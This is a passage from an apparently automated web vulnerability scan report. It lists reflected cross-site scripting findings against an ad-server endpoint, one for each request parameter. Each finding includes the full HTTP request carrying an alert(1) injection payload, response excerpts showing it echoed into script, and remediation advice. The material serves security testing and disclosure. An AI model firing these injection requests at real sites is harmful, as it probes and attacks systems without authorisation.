/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=a5ca9"-alert(1)-"ec39cdc4ef5&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/http://www.ibm.com/innovation/us/smarterplanet/index.shtml?url=midsized_busines
...[SNIP]...

1.66. http://ad.vulnerable.ad.partner/adi/N815.zdnet.com/B4822628.3 [orh parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N815.zdnet.com/B4822628.3

Issue detail

The value of the orh request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 22f2e"-alert(1)-"4dc1a9e7e19 was submitted in the orh parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N815.zdnet.com/B4822628.3;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=22f2e"-alert(1)-"4dc1a9e7e19&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/;ord=2010.11.21.21.36.46? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.zdnet.com/blog/computers/micro-center-beats-intels-deal-offers-its-64gb-ssd-for-just-9999-/4283d10a9'%3bdf7c136c81d
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:09:38 GMT
Expires: Mon, 22 Nov 2010 00:14:38 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7152

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Wed
...[SNIP]...
87/38538544/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=22f2e"-alert(1)-"4dc1a9e7e19&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/http://www.ibm.com/innovation/us/smarterplanet/index.shtml?url=midsi
...[SNIP]...

1.67. http://ad.vulnerable.ad.partner/adi/N815.zdnet.com/B4822628.3 [p parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N815.zdnet.com/B4822628.3

Issue detail

The value of the p request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 34ac4"-alert(1)-"b0330c890e3 was submitted in the p parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N815.zdnet.com/B4822628.3;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=34ac4"-alert(1)-"b0330c890e3&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/;ord=2010.11.21.21.36.46? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.zdnet.com/blog/computers/micro-center-beats-intels-deal-offers-its-64gb-ssd-for-just-9999-/4283d10a9'%3bdf7c136c81d
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:04:51 GMT
Expires: Mon, 22 Nov 2010 00:09:51 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7152

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Wed
...[SNIP]...
.net/click%3Bh%3Dv8/3a5a/17/14a/%2a/x%3B231155693%3B6-0%3B0%3B54795159%3B4307-300/250%3B38520787/38538544/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=34ac4"-alert(1)-"b0330c890e3&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=201
...[SNIP]...

1.68. http://ad.vulnerable.ad.partner/adi/N815.zdnet.com/B4822628.3 [pdom parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N815.zdnet.com/B4822628.3

Issue detail

The value of the pdom request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7e630"-alert(1)-"8fa588eb30a was submitted in the pdom parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N815.zdnet.com/B4822628.3;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=7e630"-alert(1)-"8fa588eb30a&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/;ord=2010.11.21.21.36.46? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.zdnet.com/blog/computers/micro-center-beats-intels-deal-offers-its-64gb-ssd-for-just-9999-/4283d10a9'%3bdf7c136c81d
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:10:28 GMT
Expires: Mon, 22 Nov 2010 00:15:28 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7152

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Wed
...[SNIP]...
//adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=7e630"-alert(1)-"8fa588eb30a&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/http://www.ibm.com/innovation/us/smarterplanet/index.shtml?url=midsized_business/solutions/informationpro
...[SNIP]...

1.69. http://ad.vulnerable.ad.partner/adi/N815.zdnet.com/B4822628.3 [pg parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N815.zdnet.com/B4822628.3

Issue detail

The value of the pg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c6b15"-alert(1)-"c72a06acb68 was submitted in the pg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N815.zdnet.com/B4822628.3;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAEc6b15"-alert(1)-"c72a06acb68&t=2010.11.21.21.36.46&event=58/;ord=2010.11.21.21.36.46? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.zdnet.com/blog/computers/micro-center-beats-intels-deal-offers-its-64gb-ssd-for-just-9999-/4283d10a9'%3bdf7c136c81d
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:11:17 GMT
Expires: Mon, 22 Nov 2010 00:16:17 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7063

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon
...[SNIP]...
=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAEc6b15"-alert(1)-"c72a06acb68&t=2010.11.21.21.36.46&event=58/http://www.ibm.com/systems/smarter/questions/security-resiliency.html?cmp=blank&cm=b&csr=agus_itquest-20100521&cr=zdnet&ct=609AA01A&cn=itmrgquestdubai");
var fscUrl = ur
...[SNIP]...

1.70. http://ad.vulnerable.ad.partner/adi/N815.zdnet.com/B4822628.3 [pid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N815.zdnet.com/B4822628.3

Issue detail

The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4e003"-alert(1)-"21012b00b88 was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N815.zdnet.com/B4822628.3;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=4e003"-alert(1)-"21012b00b88&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/;ord=2010.11.21.21.36.46? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.zdnet.com/blog/computers/micro-center-beats-intels-deal-offers-its-64gb-ssd-for-just-9999-/4283d10a9'%3bdf7c136c81d
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:06:33 GMT
Expires: Mon, 22 Nov 2010 00:11:33 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6715

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Fri
...[SNIP]...
z%3B231155693%3B5-0%3B0%3B54795159%3B4307-300/250%3B38460446/38478203/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=4e003"-alert(1)-"21012b00b88&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/http://www
...[SNIP]...

1.71. http://ad.vulnerable.ad.partner/adi/N815.zdnet.com/B4822628.3 [pp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N815.zdnet.com/B4822628.3

Issue detail

The value of the pp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31a76"-alert(1)-"eed06fa5ff8 was submitted in the pp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N815.zdnet.com/B4822628.3;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=10031a76"-alert(1)-"eed06fa5ff8&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/;ord=2010.11.21.21.36.46? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.zdnet.com/blog/computers/micro-center-beats-intels-deal-offers-its-64gb-ssd-for-just-9999-/4283d10a9'%3bdf7c136c81d
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:08:26 GMT
Expires: Mon, 22 Nov 2010 00:13:26 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7163

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Wed
...[SNIP]...
0%3B0%3B54795159%3B4307-300/250%3B38520812/38538569/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=10031a76"-alert(1)-"eed06fa5ff8&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/http://www.ibm.com/innovatio
...[SNIP]...

1.72. http://ad.vulnerable.ad.partner/adi/N815.zdnet.com/B4822628.3 [ppartner parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N815.zdnet.com/B4822628.3

Issue detail

The value of the ppartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ef3da"-alert(1)-"0e0b492657e was submitted in the ppartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N815.zdnet.com/B4822628.3;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=ef3da"-alert(1)-"0e0b492657e&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/;ord=2010.11.21.21.36.46? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.zdnet.com/blog/computers/micro-center-beats-intels-deal-offers-its-64gb-ssd-for-just-9999-/4283d10a9'%3bdf7c136c81d
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:10:18 GMT
Expires: Mon, 22 Nov 2010 00:15:18 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7063

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon
...[SNIP]...
fhttp://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=ef3da"-alert(1)-"0e0b492657e&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/http://www.ibm.com/systems/smarter/questions/security-resiliency.html?cmp=blank&cm=b&csr=agus_itque
...[SNIP]...

1.73. http://ad.vulnerable.ad.partner/adi/N815.zdnet.com/B4822628.3 [pt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N815.zdnet.com/B4822628.3

Issue detail

The value of the pt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e8708"-alert(1)-"6c6fa352822 was submitted in the pt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N815.zdnet.com/B4822628.3;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100e8708"-alert(1)-"6c6fa352822&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/;ord=2010.11.21.21.36.46? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.zdnet.com/blog/computers/micro-center-beats-intels-deal-offers-its-64gb-ssd-for-just-9999-/4283d10a9'%3bdf7c136c81d
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:05:52 GMT
Expires: Mon, 22 Nov 2010 00:10:52 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7119

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon
...[SNIP]...
5a/17/14a/%2a/i%3B231155693%3B1-0%3B0%3B54795159%3B4307-300/250%3B37759247/37777099/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100e8708"-alert(1)-"6c6fa352822&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event
...[SNIP]...

1.74. http://ad.vulnerable.ad.partner/adi/N815.zdnet.com/B4822628.3 [ra parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N815.zdnet.com/B4822628.3

Issue detail

The value of the ra request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cfc7e"-alert(1)-"9a508cfa52b was submitted in the ra parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N815.zdnet.com/B4822628.3;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18cfc7e"-alert(1)-"9a508cfa52b&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/;ord=2010.11.21.21.36.46? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.zdnet.com/blog/computers/micro-center-beats-intels-deal-offers-its-64gb-ssd-for-just-9999-/4283d10a9'%3bdf7c136c81d
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:11:06 GMT
Expires: Mon, 22 Nov 2010 00:16:06 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7163

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Wed
...[SNIP]...
7335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18cfc7e"-alert(1)-"9a508cfa52b&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/http://www.ibm.com/innovation/us/smarterplanet/index.shtml?url=midsized_business/solutions/informationprotection&cmp=usmmb&cm=b&csr=infoprots
...[SNIP]...

1.75. http://ad.vulnerable.ad.partner/adi/N815.zdnet.com/B4822628.3 [rqid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N815.zdnet.com/B4822628.3

Issue detail

The value of the rqid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c586e"-alert(1)-"b8e9766edfd was submitted in the rqid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N815.zdnet.com/B4822628.3;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66Bc586e"-alert(1)-"b8e9766edfd&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/;ord=2010.11.21.21.36.46? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.zdnet.com/blog/computers/micro-center-beats-intels-deal-offers-its-64gb-ssd-for-just-9999-/4283d10a9'%3bdf7c136c81d
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:09:28 GMT
Expires: Mon, 22 Nov 2010 00:14:28 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7037

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu
...[SNIP]...
